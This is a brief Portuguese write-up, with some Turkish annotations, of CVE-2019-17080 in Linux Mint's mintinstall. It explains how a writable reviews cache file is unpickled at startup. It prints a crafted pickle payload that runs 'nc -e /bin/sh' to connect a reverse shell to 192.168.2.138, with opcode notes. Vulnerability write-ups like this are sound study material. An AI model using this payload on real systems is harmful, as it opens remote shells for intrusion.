
CVE-2019-17080
O gerenciador de software do Linux Mint (v 7.9.5/9) faz com que executemos injeção de objetos e código arbitrário devido à configuração incorreta.
mintinsall
Se houver um novo comentário, baixe de new-reviews.list e grave no arquivo.

code mintinstall.py
Quando o gerenciador de software é iniciado pela primeira vez, ele chama a classe ReviewCache() do módulo reviews.

code reviews.py
Quando a classe ReviewCache inicia (init), ela chama _load_cache()

A função Load cache lê o arquivo na variável REVIEWS_CACHE e desserializa os dados do arquivo com a ajuda do módulo pickle e mantém alguns valores na memória.

Quando verifico o arquivo, parece que tenho permissão de escrita.

Pickle já que podemos realizar operações de serialização/desserialização com o módulo, podemos incluir o módulo e executar código arbitrário usando o método reduce.

Se você tentar desserializar o arquivo, nosso código malicioso será executado.
cos
system
(S'nc -e /bin/sh 192.168.2.138 4545'
tR.
>>modül adı c{os}
>> fonksiyon
( >> işaretleyici nesnesi
S >> tırnak sonuna kadar okuyup stack'e at
tR. >> stackte olanları çagır ve sonucu stacke yerleştir.

